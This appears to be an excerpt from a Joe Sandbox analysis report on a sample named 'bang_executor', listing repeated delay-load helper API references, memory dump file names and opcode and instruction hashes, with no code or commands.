                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 38a617009ba70223b4629f66405d37ae4ec403103a7e6dd594390d676392ddc6
                                        • Instruction ID: 814d79781caffb353171e7a5421d49f5f41a12013266bf4d12f510030002e648
                                        • Opcode Fuzzy Hash: 38a617009ba70223b4629f66405d37ae4ec403103a7e6dd594390d676392ddc6
                                        • Instruction Fuzzy Hash: 0CB012A635C403AD711451489D06E7F0D4CF6C4B18B30B93AF408C00C0D4411D415232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: cb3d81c5d648a49146036830db46927a487af8b87429564eef67f60a63a81dd7
                                        • Instruction ID: a486af349355bc881cf698d3c291ed5382e562d1c68527a6a26e67177133c556
                                        • Opcode Fuzzy Hash: cb3d81c5d648a49146036830db46927a487af8b87429564eef67f60a63a81dd7
                                        • Instruction Fuzzy Hash: 97B012A635D503AD725452489C06E7F0D4DF6C4B14F30AA3AF008C00C0D4401C804232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e3db5266d56f8dbf721231cbda6639f2362da2ef1b543ae423375068fca67cd0
                                        • Instruction ID: 89bb33515a9645c4c97e054ebdb43423516a6bd6c3ba1bab307d80ea5995a142
                                        • Opcode Fuzzy Hash: e3db5266d56f8dbf721231cbda6639f2362da2ef1b543ae423375068fca67cd0
                                        • Instruction Fuzzy Hash: 4FB012A335D201AC761861495C4AE7E0E4CFAC4B14B30D93EF00CC11C1D4401CC44132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 1629b38d63d3f191b4b064cd83579b9b8476c112264fdeea6bdcff24b79f2886
                                        • Instruction ID: b6f1987d485df07667a3eda8828f7c4bd5a85c00b65935a984a2379e8b2a3c5a
                                        • Opcode Fuzzy Hash: 1629b38d63d3f191b4b064cd83579b9b8476c112264fdeea6bdcff24b79f2886
                                        • Instruction Fuzzy Hash: DCB012A339D105AC710861495C4AF7E0E4CFAC4B14B30DC3EF00CC11C1D4401C800232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: a93d658f47d4ffab60e67c760eaffbf12eb19c3bc97d68aab8315613aea2fa46
                                        • Instruction ID: 5dc816e06831ddba8a2762f2dbae17fc1c9322c6cd96c8fc5623b808a62ebb2a
                                        • Opcode Fuzzy Hash: a93d658f47d4ffab60e67c760eaffbf12eb19c3bc97d68aab8315613aea2fa46
                                        • Instruction Fuzzy Hash: 2AB012A336D001AC710861889C0EF7E0E4CFAC4B14B30DE3FF00CC00C1D4401C800132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: bb13796080d9ad98cab9391d11e74cc7662b870765c15b1980588a048c8f70d4
                                        • Instruction ID: 52e94098536b5649564ad5c22b42bdcbbecef4335245f960074203e345347d86
                                        • Opcode Fuzzy Hash: bb13796080d9ad98cab9391d11e74cc7662b870765c15b1980588a048c8f70d4
                                        • Instruction Fuzzy Hash: 37B012D739E402BCB2041148BD0BDBF0E0CFAC0B1CB30DD3AF004C00C298511C410132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ba43236c6a3b204d985f659c5cc927c8a6bb237bb06ca1d29750fcee844f038
                                        • Instruction ID: 72ba1365f664dd008500b1b4734c5138c6b78b822fcd387db2abbd699295c638
                                        • Opcode Fuzzy Hash: 9ba43236c6a3b204d985f659c5cc927c8a6bb237bb06ca1d29750fcee844f038
                                        • Instruction Fuzzy Hash: DDB012D239D002ACB1045158BC0BFBF0E4CF2C4B147309D3AF008C10C1D4401C440232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f3dbd4c44a5a060922386830f3adc870d1ceacd9b0319cafb1d5e7a49a70953e
                                        • Instruction ID: 1858bc12240fd79d0480f0559ab766f4ddfad33806f9d7b67618e29e1b21f3fa
                                        • Opcode Fuzzy Hash: f3dbd4c44a5a060922386830f3adc870d1ceacd9b0319cafb1d5e7a49a70953e
                                        • Instruction Fuzzy Hash: ADB012D239D101ACB2145158BC0BEBF0E4CF2C4B147309E3AF008C11C1D4411C880632
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 48ca58e6bb2f76c0ee2816206210ebf70d9600bc96b60dcd140608611d23ebd3
                                        • Instruction ID: 25687734dfdb9fd04a52216a5e5e993f917264215c3ab003943d877b9385cca8
                                        • Opcode Fuzzy Hash: 48ca58e6bb2f76c0ee2816206210ebf70d9600bc96b60dcd140608611d23ebd3
                                        • Instruction Fuzzy Hash: 18B012D239D001ACB2045158BD0BEBF0E4CF2C4B14730DD3AF008C10C1D4411C450232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f714bcba7b5dfacd63e78abeff98409de6c6469ae373503ca4c259b3e1036f79
                                        • Instruction ID: 5afa0f4f9b877e00423d2410d7dd6862bda17f5ee27c46e0a60dfb928bf4785a
                                        • Opcode Fuzzy Hash: f714bcba7b5dfacd63e78abeff98409de6c6469ae373503ca4c259b3e1036f79
                                        • Instruction Fuzzy Hash: 9FB012D239D001ECB1045148BC0BEBF0E5CF2C4B14730DD3AF408C20C1D4401C4C0232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ccbf9fe6a943612798b1f8dbb4b3d9591b4b7fa9289756bf0349a349a9ac581
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 9ccbf9fe6a943612798b1f8dbb4b3d9591b4b7fa9289756bf0349a349a9ac581
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3bdf7ad06e9e4aa91c19f201f44a88211139e4cca7fe50621d21ef937856a3bb
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 3bdf7ad06e9e4aa91c19f201f44a88211139e4cca7fe50621d21ef937856a3bb
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 7975afcc119edb0ec4cc27f92f451245fe0844f8b1ba7b1538839aa28af3f571
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 7975afcc119edb0ec4cc27f92f451245fe0844f8b1ba7b1538839aa28af3f571
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3b3c46948e878e93b078c6644a11a346cf857c5948e7cf8c095593093a682906
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 3b3c46948e878e93b078c6644a11a346cf857c5948e7cf8c095593093a682906
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
